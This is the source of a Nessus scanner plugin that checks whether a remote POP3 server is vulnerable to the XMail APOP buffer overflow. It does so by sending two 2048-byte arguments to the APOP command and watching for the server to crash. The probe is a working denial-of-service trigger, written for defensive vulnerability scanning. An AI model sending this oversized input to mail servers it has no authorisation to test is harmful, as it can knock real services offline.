File: xmail_overflow.nasl

package info (click to toggle)
nessus-plugins 1.0.10-2
  • links: PTS
  • area: main
  • in suites: woody
  • size: 4,924 kB
  • ctags: 408
  • sloc: sh: 7,838; ansic: 3,415; makefile: 233
file content (91 lines) | stat: -rw-r--r-- 2,505 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10559);
 script_cve_id("CAN-2000-0841"); 
 name["english"] = "XMail APOP Overflow";
 name["francais"] = "Dpassement de buffer APOP dans XMail";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The remote POP3 server seems
to be subject to a buffer overflow when it receives
two too long arguments to the APOP command.

This problem may allow an attacker to disable this
pop server or to execute arbitrary code on this
host.

Solution : Contact your vendor for a patch
Risk factor : High";


 desc["francais"] = "
Le serveur POP3 distant semble etre vulnrable  un problme
de dpassement de buffer lorsqu'il recoit deux arguments trop longs
 la commande APOP.

Ce problmez peut permettre  un pirate d'executer du code
arbitraire sur ce serveur ou bien de dsactiver le serveur POP
 distance.

Solution : Contactez votre vendeur pour un patch
Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Attempts to overflow the APOP command";
 summary["francais"] = "Essaye de trop remplir les buffers de la commande APOP";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "qpopper.nasl");
 script_exclude_keys("pop3/false_pop3");
 script_require_ports("Services/pop3", 110);
 exit(0);
}

#
# The script code starts here
#

fake = get_kb_item("pop3/false_pop3");
if(fake)exit(0);
port = get_kb_item("Services/pop3");
if(!port)port = 110;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  d = recv_line(socket:soc, length:1024);
  if(!d){close(soc);exit(0);}
  c = string("APOP ", crap(2048), " ", crap(2048), "\r\n");
  send(socket:soc, data:c);
  r = recv_line(socket:soc, length:1024);
  if(!r){
  	security_hole(port);
  	exit(0);
	}
  close(soc);
  soc = open_sock_tcp(port);
  if(!soc)security_hole(port);
  else {
   	r = recv_line(socket:soc, length:1024);
	if(!r)security_hole(port);
	close(soc);
	}
 
 }
}